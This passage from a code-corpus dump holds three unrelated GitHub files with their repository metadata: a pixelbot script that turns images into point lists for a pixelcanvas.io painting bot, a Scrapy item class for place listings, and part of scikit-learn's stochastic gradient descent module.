(34, 34, 34),
(255, 167, 209),
(229, 0, 0),
(229, 149, 0),
(160, 106, 66),
(229, 217, 0),
(148, 224, 68),
(2, 190, 1),
(0, 211, 221),
(0, 131, 199),
(0, 0, 234),
(207, 110, 228),
(130, 0, 128),
]
def points_from_text(file_path):
with open(file_path, 'r') as f:
lines = f.readlines()
points = []
for row, line in enumerate(lines):
for col, character in enumerate(line):
try:
color = int(character)
points.append(Point(col, row, color))
except:
pass
return points
def points_from_image(image_path):
"""Parse an image into a list of points to paint on pixelcanvas.io."""
from PIL import Image
image = Image.open(image_path)
image_data = image.getdata()
print('Producing bot from image \'{}\' with resolution {}x{}.'.format(image_path, image.width, image.height), file=sys.stderr)
# Iterate through each pixel, build a equivalent point.
points = []
for y in range(image.height):
for x in range(image.width):
# Use a fancy index, because all pixels are in a single array.
i = x + y*image.width
pixel = image_data[i]
# Only use this pixel if it is not transparent.
if pixel[3] != 0:
# Here is the trick part. We consider the RGB, as a 3D space.
# and calculate the euclidean distance from the pixel's color,
# and each of the avaiable colors. We do this, so that we find
# the best color to represent that pixel (since we have a limited
# color pallete).
minimum_distance = 256**3
for color_index, color in enumerate(COLORS):
distance = math.sqrt((pixel[0] - color[0])**2 + (pixel[1] - color[1])**2 + (pixel[2] - color[2])**2)
if distance < minimum_distance:
minimum_distance = distance
best_color = color_index
points.append(Point(x, y, best_color))
return points
def produce_bot(points, ox, oy, fingerprint, save_path):
"""Use the bot template to produce bot ready for use."""
# Prepare template.
with open(args.bot_template) as f:
lines = f.readlines()
template = Template(''.join(lines))
print('Using template from `{}`.'.format(args.bot_template), file=sys.stderr)
# Join points on a single string.
points_string = ''
for point in points:
points_string += str(point) + ', '
# Produce and save the bot.
bot_content = template.substitute(
points=points_string,
ox=ox, oy=oy,
fingerprint=fingerprint)
with open(save_path, 'w') as f:
f.write(bot_content)
def main():
print('Parsing file...', file=sys.stderr)
if args.file_path.endswith('.txt'):
points = points_from_text(args.file_path)
elif re.match(r'.*\.(png|bmp|jpg|jpeg|gif)$', args.file_path):
points = points_from_image(args.file_path)
else:
print('Can\'t produce any bot from \'{}\'.'.format(args.file_path), file=sys.stderr)
exit(1)
print('Number of points produced: {}.'.format(len(points)), file=sys.stderr)
# Decide where to save the bot to.
if args.save_to:
bot_save_path = args.save_to
else:
bot_save_path = re.sub(r'\.\w+$', '.js', args.file_path)
# Create and save the bot.
print('Saving bot to \'{}\'...'.format(bot_save_path), file=sys.stderr)
produce_bot(points, args.x_offset, args.y_offset, args.fingerprint, bot_save_path)
print('All done.', file=sys.stderr)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='')
parser.add_argument('file_path', help='The file indicating what should be built by the robot. It can be an image or a text file.')
parser.add_argument('x_offset', type=int, help='X coordinate for where in the canvas the drawing should be painted.')
parser.add_argument('y_offset', type=int, help='Y coordinate for where in the canvas the drawing should be painted.')
parser.add_argument('fingerprint', help='Your fingerprint.')
parser.add_argument('-t', '--bot-template', default='template/pixelbot-fetch-template.js', help='Location do the template which will produce the bot.')
parser.add_argument('-s', '--save-to', help='Where the bot script should be saved to. Defaults to <file_path> terminating with `.js`.')
args = parser.parse_args()
main()
| {
"content_hash": "9b66d86c2e9c28dc803172760bfef3c1",
"timestamp": "",
"source": "github",
"line_count": 138,
"max_line_length": 155,
"avg_line_length": 36.67391304347826,
"alnum_prop": 0.5900019758940921,
"repo_name": "possatti/pixelbot",
"id": "bc3c350d113a0a38f8d256e2d0ee11e3e69195e2",
"size": "5108",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "botfactory.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "JavaScript",
"bytes": "4466"
},
{
"name": "Python",
"bytes": "7403"
}
],
"symlink_target": ""
} |
from scrapy import Item, Field
class PcrawlerItem(Item):
name = Field()
street = Field()
district = Field()
city = Field()
open_time = Field()
address = Field()
close_time = Field()
open_close = Field()
price = Field()
ratings = Field()
lat = Field()
lon = Field()
| {
"content_hash": "6719bf69334db0ca63ead30e0821985f",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 30,
"avg_line_length": 19.6875,
"alnum_prop": 0.5682539682539682,
"repo_name": "fmlvn/anphode",
"id": "68366db7bb7e8f8f7dc2df602a893ba3d6fb30ba",
"size": "467",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pcrawler/pcrawler/items.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Makefile",
"bytes": "211"
},
{
"name": "Python",
"bytes": "11019"
}
],
"symlink_target": ""
} |
"""Classification and regression using Stochastic Gradient Descent (SGD)."""
import numpy as np
import warnings
from abc import ABCMeta, abstractmethod
from ..externals.joblib import Parallel, delayed
from .base import LinearClassifierMixin, SparseCoefMixin
from .base import make_dataset
from ..base import BaseEstimator, RegressorMixin
from ..utils import check_array, check_random_state, check_X_y
from ..utils.extmath import safe_sparse_dot
from ..utils.multiclass import _check_partial_fit_first_call
from ..utils.validation import check_is_fitted
from ..exceptions import ConvergenceWarning
from ..externals import six
from .sgd_fast import plain_sgd, average_sgd
from ..utils import compute_class_weight
from ..utils import deprecated
from .sgd_fast import Hinge
from .sgd_fast import SquaredHinge
from .sgd_fast import Log
from .sgd_fast import ModifiedHuber
from .sgd_fast import SquaredLoss
from .sgd_fast import Huber
from .sgd_fast import EpsilonInsensitive
from .sgd_fast import SquaredEpsilonInsensitive
LEARNING_RATE_TYPES = {"constant": 1, "optimal": 2, "invscaling": 3,
"pa1": 4, "pa2": 5}
PENALTY_TYPES = {"none": 0, "l2": 2, "l1": 1, "elasticnet": 3}
DEFAULT_EPSILON = 0.1
# Default value of ``epsilon`` parameter.
class BaseSGD(six.with_metaclass(ABCMeta, BaseEstimator, SparseCoefMixin)):
"""Base class for SGD classification and regression."""
def __init__(self, loss, penalty='l2', alpha=0.0001, C=1.0,
l1_ratio=0.15, fit_intercept=True, max_iter=None, tol=None,
shuffle=True, verbose=0, epsilon=0.1, random_state=None,
learning_rate="optimal", eta0=0.0, power_t=0.5,
warm_start=False, average=False, n_iter=None):
self.loss = loss
self.penalty = penalty
self.learning_rate = learning_rate
self.epsilon = epsilon
self.alpha = alpha
self.C = C
self.l1_ratio = l1_ratio
self.fit_intercept = fit_intercept
self.shuffle = shuffle
self.random_state = random_state
self.verbose = verbose
self.eta0 = eta0
self.power_t = power_t
self.warm_start = warm_start
self.average = average
self.n_iter = n_iter
self.max_iter = max_iter
self.tol = tol
# current tests expect init to do parameter validation
# but we are not allowed to set attributes
self._validate_params(set_max_iter=False)
def set_params(self, *args, **kwargs):
super(BaseSGD, self).set_params(*args, **kwargs)
self._validate_params(set_max_iter=False)
return self
@abstractmethod
def fit(self, X, y):
"""Fit model."""
def _validate_params(self, set_max_iter=True):
"""Validate input params. """
if not isinstance(self.shuffle, bool):
raise ValueError("shuffle must be either True or False")
if self.max_iter is not None and self.max_iter <= 0:
raise ValueError("max_iter must be > zero. Got %f" % self.max_iter)
if not (0.0 <= self.l1_ratio <= 1.0):
raise ValueError("l1_ratio must be in [0, 1]")
if self.alpha < 0.0:
raise ValueError("alpha must be >= 0")
if self.learning_rate in ("constant", "invscaling"):
if self.eta0 <= 0.0:
raise ValueError("eta0 must be > 0")
if self.learning_rate == "optimal" and self.alpha == 0:
raise ValueError("alpha must be > 0 since "
"learning_rate is 'optimal'. alpha is used "
"to compute the optimal learning rate.")
# raises ValueError if not registered
self._get_penalty_type(self.penalty)
self._get_learning_rate_type(self.learning_rate)
if self.loss not in self.loss_functions:
raise ValueError("The loss %s is not supported. " % self.loss)
if not set_max_iter:
return
# n_iter deprecation, set self._max_iter, self._tol
self._tol = self.tol
if self.n_iter is not None:
warnings.warn("n_iter parameter is deprecated in 0.19 and will be"
" removed in 0.21. Use max_iter and tol instead.",
DeprecationWarning)
# Same behavior as before 0.19
max_iter = self.n_iter
self._tol = None
elif self.tol is None and self.max_iter is None:
warnings.warn(
"max_iter and tol parameters have been added in %s in 0.19. If"
" both are left unset, they default to max_iter=5 and tol=None"
". If tol is not None, max_iter defaults to max_iter=1000. "
"From 0.21, default max_iter will be 1000, "
"and default tol will be 1e-3." % type(self), FutureWarning)
# Before 0.19, default was n_iter=5
max_iter = 5
else:
max_iter = self.max_iter if self.max_iter is not None else 1000
self._max_iter = max_iter
def _get_loss_function(self, loss):
"""Get concrete ``LossFunction`` object for str ``loss``. """
try:
loss_ = self.loss_functions[loss]
loss_class, args = loss_[0], loss_[1:]
if loss in ('huber', 'epsilon_insensitive',
'squared_epsilon_insensitive'):
args = (self.epsilon, )
return loss_class(*args)
except KeyError:
raise ValueError("The loss %s is not supported. " % loss)
def _get_learning_rate_type(self, learning_rate):
try:
return LEARNING_RATE_TYPES[learning_rate]
except KeyError:
raise ValueError("learning rate %s "
"is not supported. " % learning_rate)
def _get_penalty_type(self, penalty):
penalty = str(penalty).lower()
try:
return PENALTY_TYPES[penalty]
except KeyError:
raise ValueError("Penalty %s is not supported. " % penalty)
def _validate_sample_weight(self, sample_weight, n_samples):
"""Set the sample weight array."""
if sample_weight is None:
# uniform sample weights
sample_weight = np.ones(n_samples, dtype=np.float64, order='C')
else:
# user-provided array
sample_weight = np.asarray(sample_weight, dtype=np.float64,
order="C")
if sample_weight.shape[0] != n_samples:
raise ValueError("Shapes of X and sample_weight do not match.")
return sample_weight
def _allocate_parameter_mem(self, n_classes, n_features, coef_init=None,
intercept_init=None):
"""Allocate mem for parameters; initialize if provided."""
if n_classes > 2:
# allocate coef_ for multi-class
if coef_init is not None:
coef_init = np.asarray(coef_init, order="C")
if coef_init.shape != (n_classes, n_features):
raise ValueError("Provided ``coef_`` does not match "
"dataset. ")
self.coef_ = coef_init
else:
self.coef_ = np.zeros((n_classes, n_features),
dtype=np.float64, order="C")
# allocate intercept_ for multi-class
if intercept_init is not None:
intercept_init = np.asarray(intercept_init, order="C")
if intercept_init.shape != (n_classes, ):
raise ValueError("Provided intercept_init "
"does not match dataset.")
self.intercept_ = intercept_init
else:
self.intercept_ = np.zeros(n_classes, dtype=np.float64,
order="C")
else:
# allocate coef_ for binary problem
if coef_init is not None:
coef_init = np.asarray(coef_init, dtype=np.float64,
order="C")
coef_init = coef_init.ravel()
if coef_init.shape != (n_features,):
raise ValueError("Provided coef_init does not "
"match dataset.")
self.coef_ = coef_init
else:
self.coef_ = np.zeros(n_features,
dtype=np.float64,
order="C")
# allocate intercept_ for binary problem
if intercept_init is not None:
intercept_init = np.asarray(intercept_init, dtype=np.float64)
if intercept_init.shape != (1,) and intercept_init.shape != ():
raise ValueError("Provided intercept_init "
"does not match dataset.")
self.intercept_ = intercept_init.reshape(1,)
else:
self.intercept_ = np.zeros(1, dtype=np.float64, order="C")
# initialize average parameters
if self.average > 0:
self.standard_coef_ = self.coef_
self.standard_intercept_ = self.intercept_
self.average_coef_ = np.zeros(self.coef_.shape,
dtype=np.float64,
order="C")
self.average_intercept_ = np.zeros(self.standard_intercept_.shape,
dtype=np.float64,
order="C")
def _prepare_fit_binary(est, y, i):
"""Initialization for fit_binary.
Returns y, coef, intercept.
"""
y_i = np.ones(y.shape, dtype=np.float64, order="C")
y_i[y != est.classes_[i]] = -1.0
average_intercept = 0
average_coef = None
if len(est.classes_) == 2:
if not est.average:
coef = est.coef_.ravel()
intercept = est.intercept_[0]
else:
coef = est.standard_coef_.ravel()
intercept = est.standard_intercept_[0]
average_coef = est.average_coef_.ravel()
average_intercept = est.average_intercept_[0]
else:
if not est.average:
coef = est.coef_[i]
intercept = est.intercept_[i]
else:
coef = est.standard_coef_[i]
intercept = est.standard_intercept_[i]
average_coef = est.average_coef_[i]
average_intercept = est.average_intercept_[i]
return y_i, coef, intercept, average_coef, average_intercept
def fit_binary(est, i, X, y, alpha, C, learning_rate, max_iter,
pos_weight, neg_weight, sample_weight):
"""Fit a single binary classifier.
The i'th class is considered the "positive" class.
"""
# if average is not true, average_coef, and average_intercept will be
# unused
y_i, coef, intercept, average_coef, average_intercept = \
_prepare_fit_binary(est, y, i)
assert y_i.shape[0] == y.shape[0] == sample_weight.shape[0]
dataset, intercept_decay = make_dataset(X, y_i, sample_weight)
penalty_type = est._get_penalty_type(est.penalty)
learning_rate_type = est._get_learning_rate_type(learning_rate)
# XXX should have random_state_!
random_state = check_random_state(est.random_state)
# numpy mtrand expects a C long which is a signed 32 bit integer under
# Windows
seed = random_state.randint(0, np.iinfo(np.int32).max)
tol = est.tol if est.tol is not None else -np.inf
if not est.average:
return plain_sgd(coef, intercept, est.loss_function_,
penalty_type, alpha, C, est.l1_ratio,
dataset, max_iter, tol, int(est.fit_intercept),
int(est.verbose), int(est.shuffle), seed,
pos_weight, neg_weight,
learning_rate_type, est.eta0,
est.power_t, est.t_, intercept_decay)
else:
standard_coef, standard_intercept, average_coef, average_intercept, \
n_iter_ = average_sgd(coef, intercept, average_coef,
average_intercept, est.loss_function_,
penalty_type, alpha, C, est.l1_ratio,
dataset, max_iter, tol,
int(est.fit_intercept), int(est.verbose),
int(est.shuffle), seed, pos_weight,
neg_weight, learning_rate_type, est.eta0,
est.power_t, est.t_, intercept_decay,
est.average)
if len(est.classes_) == 2:
est.average_intercept_[0] = average_intercept
else:
est.average_intercept_[i] = average_intercept
return standard_coef, standard_intercept, n_iter_
class BaseSGDClassifier(six.with_metaclass(ABCMeta, BaseSGD,
LinearClassifierMixin)):
loss_functions = {
"hinge": (Hinge, 1.0),
"squared_hinge": (SquaredHinge, 1.0),
"perceptron": (Hinge, 0.0),
"log": (Log, ),
"modified_huber": (ModifiedHuber, ),
"squared_loss": (SquaredLoss, ),
"huber": (Huber, DEFAULT_EPSILON),
"epsilon_insensitive": (EpsilonInsensitive, DEFAULT_EPSILON),
"squared_epsilon_insensitive": (SquaredEpsilonInsensitive,
DEFAULT_EPSILON),
}
@abstractmethod
def __init__(self, loss="hinge", penalty='l2', alpha=0.0001,
l1_ratio=0.15, fit_intercept=True, max_iter=None, tol=None,
shuffle=True, verbose=0, epsilon=DEFAULT_EPSILON, n_jobs=1,
random_state=None, learning_rate="optimal", eta0=0.0,
power_t=0.5, class_weight=None, warm_start=False,
average=False, n_iter=None):
super(BaseSGDClassifier, self).__init__(loss=loss, penalty=penalty,
alpha=alpha, l1_ratio=l1_ratio,
fit_intercept=fit_intercept,
max_iter=max_iter, tol=tol,
shuffle=shuffle,
verbose=verbose,
epsilon=epsilon,
random_state=random_state,
learning_rate=learning_rate,
eta0=eta0, power_t=power_t,
warm_start=warm_start,
average=average,
n_iter=n_iter)
self.class_weight = class_weight
self.n_jobs = int(n_jobs)
@property
@deprecated("Attribute loss_function was deprecated in version 0.19 and "
"will be removed in 0.21. Use ``loss_function_`` instead")
def loss_function(self):
return self.loss_function_
def _partial_fit(self, X, y, alpha, C,
loss, learning_rate, max_iter,
classes, sample_weight,
coef_init, intercept_init):
X, y = check_X_y(X, y, 'csr', dtype=np.float64, order="C")
n_samples, n_features = X.shape
_check_partial_fit_first_call(self, classes)
n_classes = self.classes_.shape[0]
# Allocate datastructures from input arguments
self._expanded_class_weight = compute_class_weight(self.class_weight,
self.classes_, y)
sample_weight = self._validate_sample_weight(sample_weight, n_samples)
if getattr(self, "coef_", None) is None or coef_init is not None:
self._allocate_parameter_mem(n_classes, n_features,
coef_init, intercept_init)
elif n_features != self.coef_.shape[-1]:
raise ValueError("Number of features %d does not match previous "
"data %d." % (n_features, self.coef_.shape[-1]))
self.loss_function_ = self._get_loss_function(loss)
if not hasattr(self, "t_"):
self.t_ = 1.0
# delegate to concrete training procedure
if n_classes > 2:
self._fit_multiclass(X, y, alpha=alpha, C=C,
learning_rate=learning_rate,
sample_weight=sample_weight,
max_iter=max_iter)
elif n_classes == 2:
self._fit_binary(X, y, alpha=alpha, C=C,
learning_rate=learning_rate,
sample_weight=sample_weight,
max_iter=max_iter)
else:
raise ValueError(
"The number of classes has to be greater than one;"
" got %d class" % n_classes)
return self
def _fit(self, X, y, alpha, C, loss, learning_rate, coef_init=None,
intercept_init=None, sample_weight=None):
self._validate_params()
if hasattr(self, "classes_"):
self.classes_ = None
X, y = check_X_y(X, y, 'csr', dtype=np.float64, order="C")
n_samples, n_features = X.shape
# labels can be encoded as float, int, or string literals
# np.unique sorts in asc order; largest class id is positive class
classes = np.unique(y)
if self.warm_start and hasattr(self, "coef_"):
if coef_init is None:
coef_init = self.coef_
if intercept_init is None:
intercept_init = self.intercept_
else:
self.coef_ = None
self.intercept_ = None
if self.average > 0:
self.standard_coef_ = self.coef_
self.standard_intercept_ = self.intercept_
self.average_coef_ = None
self.average_intercept_ = None
# Clear iteration count for multiple call to fit.
self.t_ = 1.0
self._partial_fit(X, y, alpha, C, loss, learning_rate, self._max_iter,
classes, sample_weight, coef_init, intercept_init)
if (self._tol is not None and self._tol > -np.inf
and self.n_iter_ == self._max_iter):
warnings.warn("Maximum number of iteration reached before "
"convergence. Consider increasing max_iter to "
"improve the fit.",
ConvergenceWarning)
return self
def _fit_binary(self, X, y, alpha, C, sample_weight,
learning_rate, max_iter):
"""Fit a binary classifier on X and y. """
coef, intercept, n_iter_ = fit_binary(self, 1, X, y, alpha, C,
learning_rate, max_iter,
self._expanded_class_weight[1],
self._expanded_class_weight[0],
sample_weight)
self.t_ += n_iter_ * X.shape[0]
self.n_iter_ = n_iter_
# need to be 2d
if self.average > 0:
if self.average <= self.t_ - 1:
self.coef_ = self.average_coef_.reshape(1, -1)
self.intercept_ = self.average_intercept_
else:
self.coef_ = self.standard_coef_.reshape(1, -1)
self.standard_intercept_ = np.atleast_1d(intercept)
self.intercept_ = self.standard_intercept_
else:
self.coef_ = coef.reshape(1, -1)
# intercept is a float, need to convert it to an array of length 1
self.intercept_ = np.atleast_1d(intercept)
def _fit_multiclass(self, X, y, alpha, C, learning_rate,
sample_weight, max_iter):
"""Fit a multi-class classifier by combining binary classifiers
Each binary classifier predicts one class versus all others. This
strategy is called OVA: One Versus All.
"""
# Use joblib to fit OvA in parallel.
result = Parallel(n_jobs=self.n_jobs, backend="threading",
verbose=self.verbose)(
delayed(fit_binary)(self, i, X, y, alpha, C, learning_rate,
max_iter, self._expanded_class_weight[i],
1., sample_weight)
for i in range(len(self.classes_)))
# take the maximum of n_iter_ over every binary fit
n_iter_ = 0.
for i, (_, intercept, n_iter_i) in enumerate(result):
self.intercept_[i] = intercept
n_iter_ = max(n_iter_, n_iter_i)
self.t_ += n_iter_ * X.shape[0]
self.n_iter_ = n_iter_
if self.average > 0:
if self.average <= self.t_ - 1.0:
self.coef_ = self.average_coef_
self.intercept_ = self.average_intercept_
else:
self.coef_ = self.standard_coef_
self.standard_intercept_ = np.atleast_1d(self.intercept_)
self.intercept_ = self.standard_intercept_
def partial_fit(self, X, y, classes=None, sample_weight=None):
"""Fit linear model with Stochastic Gradient Descent.
Parameters
----------
X : {array-like, sparse matrix}, shape (n_samples, n_features)
Subset of the training data
y : numpy array, shape (n_samples,)
Subset of the target values
classes : array, shape (n_classes,)
Classes across all calls to partial_fit.
Can be obtained by via `np.unique(y_all)`, where y_all is the
target vector of the entire dataset.
This argument is required for the first call to partial_fit
and can be omitted in the subsequent calls.
Note that y doesn't need to contain all labels in `classes`.
sample_weight : array-like, shape (n_samples,), optional
Weights applied to individual samples.
If not provided, uniform weights are assumed.
Returns
-------
self : returns an instance of self.
"""
self._validate_params()
if self.class_weight in ['balanced']:
raise ValueError("class_weight '{0}' is not supported for "
"partial_fit. In order to use 'balanced' weights,"
" use compute_class_weight('{0}', classes, y). "
"In place of y you can us a large enough sample "
"of the full training set target to properly "
"estimate the class frequency distributions. "
"Pass the resulting weights as the class_weight "
"parameter.".format(self.class_weight))
return self._partial_fit(X, y, alpha=self.alpha, C=1.0, loss=self.loss,
learning_rate=self.learning_rate, max_iter=1,
classes=classes, sample_weight=sample_weight,
coef_init=None, intercept_init=None)
def fit(self, X, y, coef_init=None, intercept_init=None,
sample_weight=None):
"""Fit linear model with Stochastic Gradient Descent.
Parameters
----------
X : {array-like, sparse matrix}, shape (n_samples, n_features)
Training data
y : numpy array, shape (n_samples,)
Target values
coef_init : array, shape (n_classes, n_features)
The initial coefficients to warm-start the optimization.
intercept_init : array, shape (n_classes,)
The initial intercept to warm-start the optimization.
sample_weight : array-like, shape (n_samples,), optional
Weights applied to individual samples.
If not provided, uniform weights are assumed. These weights will
be multiplied with class_weight (passed through the
constructor) if class_weight is specified
Returns
-------
self : returns an instance of self.
"""
return self._fit(X, y, alpha=self.alpha, C=1.0,
loss=self.loss, learning_rate=self.learning_rate,
coef_init=coef_init, intercept_init=intercept_init,
sample_weight=sample_weight)
class SGDClassifier(BaseSGDClassifier):
"""Linear classifiers (SVM, logistic regression, a.o.) with SGD training.
This estimator implements regularized linear models with stochastic
gradient descent (SGD) learning: the gradient of the loss is estimated
each sample at a time and the model is updated along the way with a
decreasing strength schedule (aka learning rate). SGD allows minibatch
(online/out-of-core) learning, see the partial_fit method.
For best results using the default learning rate schedule, the data should
have zero mean and unit variance.
This implementation works with data represented as dense or sparse arrays
of floating point values for the features. The model it fits can be
controlled with the loss parameter; by default, it fits a linear support
vector machine (SVM).
The regularizer is a penalty added to the loss function that shrinks model
parameters towards the zero vector using either the squared euclidean norm
L2 or the absolute norm L1 or a combination of both (Elastic Net). If the
parameter update crosses the 0.0 value because of the regularizer, the
update is truncated to 0.0 to allow for learning sparse models and achieve
online feature selection.
Read more in the :ref:`User Guide <sgd>`.
Parameters
----------
loss : str, default: 'hinge'
The loss function to be used. Defaults to 'hinge', which gives a
linear SVM.
The possible options are 'hinge', 'log', 'modified_huber',
'squared_hinge', 'perceptron', or a regression loss: 'squared_loss',
'huber', 'epsilon_insensitive', or 'squared_epsilon_insensitive'.
The 'log' loss gives logistic regression, a probabilistic classifier.
'modified_huber' is another smooth loss that brings tolerance to
outliers as well as probability estimates.
'squared_hinge' is like hinge but is quadratically penalized.
'perceptron' is the linear loss used by the perceptron algorithm.
The other losses are designed for regression but can be useful in
classification as well; see SGDRegressor for a description.
penalty : str, 'none', 'l2', 'l1', or 'elasticnet'
The penalty (aka regularization term) to be used. Defaults to 'l2'
which is the standard regularizer for linear SVM models. 'l1' and
'elasticnet' might bring sparsity to the model (feature selection)
not achievable with 'l2'.
alpha : float
Constant that multiplies the regularization term. Defaults to 0.0001
Also used to compute learning_rate when set to 'optimal'.
l1_ratio : float
The Elastic Net mixing parameter, with 0 <= l1_ratio <= 1.
l1_ratio=0 corresponds to L2 penalty, l1_ratio=1 to L1.
Defaults to 0.15.
fit_intercept : bool
Whether the intercept should be estimated or not. If False, the
data is assumed to be already centered. Defaults to True.
max_iter : int, optional
The maximum number of passes over the training data (aka epochs).
It only impacts the behavior in the ``fit`` method, and not the
`partial_fit`.
Defaults to 5. Defaults to 1000 from 0.21, or if tol is not None.
.. versionadded:: 0.19
tol : float or None, optional
The stopping criterion. If it is not None, the iterations will stop
when (loss > previous_loss - tol). Defaults to None.
Defaults to 1e-3 from 0.21.
.. versionadded:: 0.19
shuffle : bool, optional
Whether or not the training data should be shuffled after each epoch.
Defaults to True.
verbose : integer, optional
The verbosity level
epsilon : float
Epsilon in the epsilon-insensitive loss functions; only if `loss` is
'huber', 'epsilon_insensitive', or 'squared_epsilon_insensitive'.
For 'huber', determines the threshold at which it becomes less
important to get the prediction exactly right.
For epsilon-insensitive, any differences between the current prediction
and the correct label are ignored if they are less than this threshold.
n_jobs : integer, optional
The number of CPUs to use to do the OVA (One Versus All, for
multi-class problems) computation. -1 means 'all CPUs'. Defaults
to 1.
random_state : int, RandomState instance or None, optional (default=None)
The seed of the pseudo random number generator to use when shuffling
the data. If int, random_state is the seed used by the random number
generator; If RandomState instance, random_state is the random number
generator; If None, the random number generator is the RandomState
instance used by `np.random`.
learning_rate : string, optional
The learning rate schedule:
- 'constant': eta = eta0
- 'optimal': eta = 1.0 / (alpha * (t + t0)) [default]
- 'invscaling': eta = eta0 / pow(t, power_t)
where t0 is chosen by a heuristic proposed by Leon Bottou.
eta0 : double
The initial learning rate for the 'constant' or 'invscaling'
schedules. The default value is 0.0 as eta0 is not used by the
default schedule 'optimal'.
power_t : double
The exponent for inverse scaling learning rate [default 0.5].
class_weight : dict, {class_label: weight} or "balanced" or None, optional
Preset for the class_weight fit parameter.
Weights associated with classes. If not given, all classes
are supposed to have weight one.
The "balanced" mode uses the values of y to automatically adjust
weights inversely proportional to class frequencies in the input data
as ``n_samples / (n_classes * np.bincount(y))``
warm_start : bool, optional
When set to True, reuse the solution of the previous call to fit as
initialization, otherwise, just erase the previous solution.
average : bool or int, optional
When set to True, computes the averaged SGD weights and stores the
result in the ``coef_`` attribute. If set to an int greater than 1,
averaging will begin once the total number of samples seen reaches
average. So ``average=10`` will begin averaging after seeing 10
samples.
n_iter : int, optional
The number of passes over the training data (aka epochs).
Defaults to None. Deprecated, will be removed in 0.21.
.. versionchanged:: 0.19
Deprecated
Attributes
----------
coef_ : array, shape (1, n_features) if n_classes == 2 else (n_classes,\
n_features)
Weights assigned to the features.
intercept_ : array, shape (1,) if n_classes == 2 else (n_classes,)
Constants in decision function.
n_iter_ : int
The actual number of iterations to reach the stopping criterion.
For multiclass fits, it is the maximum over every binary fit.
loss_function_ : concrete ``LossFunction``
Examples
--------
>>> import numpy as np
>>> from sklearn import linear_model
>>> X = np.array([[-1, -1], [-2, -1], [1, 1], [2, 1]])
>>> Y = np.array([1, 1, 2, 2])
>>> clf = linear_model.SGDClassifier()
>>> clf.fit(X, Y)
... #doctest: +NORMALIZE_WHITESPACE
SGDClassifier(alpha=0.0001, average=False, class_weight=None, epsilon=0.1,
eta0=0.0, fit_intercept=True, l1_ratio=0.15,
learning_rate='optimal', loss='hinge', max_iter=None, n_iter=None,
n_jobs=1, penalty='l2', power_t=0.5, random_state=None,
shuffle=True, tol=None, verbose=0, warm_start=False)
>>> print(clf.predict([[-0.8, -1]]))
[1]
See also
--------
LinearSVC, LogisticRegression, Perceptron
"""
def __init__(self, loss="hinge", penalty='l2', alpha=0.0001, l1_ratio=0.15,
fit_intercept=True, max_iter=None, tol=None, shuffle=True,
verbose=0, epsilon=DEFAULT_EPSILON, n_jobs=1,
random_state=None, learning_rate="optimal", eta0=0.0,
power_t=0.5, class_weight=None, warm_start=False,
average=False, n_iter=None):
super(SGDClassifier, self).__init__(
loss=loss, penalty=penalty, alpha=alpha, l1_ratio=l1_ratio,
fit_intercept=fit_intercept, max_iter=max_iter, tol=tol,
shuffle=shuffle, verbose=verbose, epsilon=epsilon, n_jobs=n_jobs,
random_state=random_state, learning_rate=learning_rate, eta0=eta0,
power_t=power_t, class_weight=class_weight, warm_start=warm_start,
average=average, n_iter=n_iter)
def _check_proba(self):
check_is_fitted(self, "t_")
if self.loss not in ("log", "modified_huber"):
raise AttributeError("probability estimates are not available for"
" loss=%r" % self.loss)
@property
def predict_proba(self):
"""Probability estimates.
This method is only available for log loss and modified Huber loss.
Multiclass probability estimates are derived from binary (one-vs.-rest)
estimates by simple normalization, as recommended by Zadrozny and
Elkan.
Binary probability estimates for loss="modified_huber" are given by
(clip(decision_function(X), -1, 1) + 1) / 2. For other loss functions
it is necessary to perform proper probability calibration by wrapping
the classifier with
:class:`sklearn.calibration.CalibratedClassifierCV` instead.
Parameters
----------
X : {array-like, sparse matrix}, shape (n_samples, n_features)
Returns
-------
array, shape (n_samples, n_classes)
Returns the probability of the sample for each class in the model,
where classes are ordered as they are in `self.classes_`.
References
----------
Zadrozny and Elkan, "Transforming classifier scores into multiclass
probability estimates", SIGKDD'02,
http://www.research.ibm.com/people/z/zadrozny/kdd2002-Transf.pdf
The justification for the formula in the loss="modified_huber"
case is in the appendix B in:
http://jmlr.csail.mit.edu/papers/volume2/zhang02c/zhang02c.pdf
"""
self._check_proba()
return self._predict_proba
def _predict_proba(self, X):
if self.loss == "log":
return self._predict_proba_lr(X)
elif self.loss == "modified_huber":
binary = (len(self.classes_) == 2)
scores = self.decision_function(X)
if binary:
prob2 = np.ones((scores.shape[0], 2))
prob = prob2[:, 1]
else:
prob = scores
np.clip(scores, -1, 1, prob)
prob += 1.
prob /= 2.
if binary:
prob2[:, 0] -= prob
prob = prob2
else:
# the above might assign zero to all classes, which doesn't
# normalize neatly; work around this to produce uniform
# probabilities
prob_sum = prob.sum(axis=1)
all_zero = (prob_sum == 0)
if np.any(all_zero):
prob[all_zero, :] = 1
prob_sum[all_zero] = len(self.classes_)
# normalize
prob /= prob_sum.reshape((prob.shape[0], -1))
return prob
else:
raise NotImplementedError("predict_(log_)proba only supported when"
" loss='log' or loss='modified_huber' "
"(%r given)" % self.loss)
@property
def predict_log_proba(self):
"""Log of probability estimates.
This method is only available for log loss and modified Huber loss.
When loss="modified_huber", probability estimates may be hard zeros
and ones, so taking the logarithm is not possible.
See ``predict_proba`` for details.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Returns
-------
T : array-like, shape (n_samples, n_classes)
Returns the log-probability of the sample for each class in the
model, where classes are ordered as they are in
`self.classes_`.
"""
self._check_proba()
return self._predict_log_proba
def _predict_log_proba(self, X):
return np.log(self.predict_proba(X))
class BaseSGDRegressor(BaseSGD, RegressorMixin):
loss_functions = {
"squared_loss": (SquaredLoss, ),
"huber": (Huber, DEFAULT_EPSILON),
"epsilon_insensitive": (EpsilonInsensitive, DEFAULT_EPSILON),
"squared_epsilon_insensitive": (SquaredEpsilonInsensitive,
DEFAULT_EPSILON),
}
@abstractmethod
def __init__(self, loss="squared_loss", penalty="l2", alpha=0.0001,
l1_ratio=0.15, fit_intercept=True, max_iter=None, tol=None,
shuffle=True, verbose=0, epsilon=DEFAULT_EPSILON,
random_state=None, learning_rate="invscaling", eta0=0.01,
power_t=0.25, warm_start=False, average=False, n_iter=None):
super(BaseSGDRegressor, self).__init__(loss=loss, penalty=penalty,
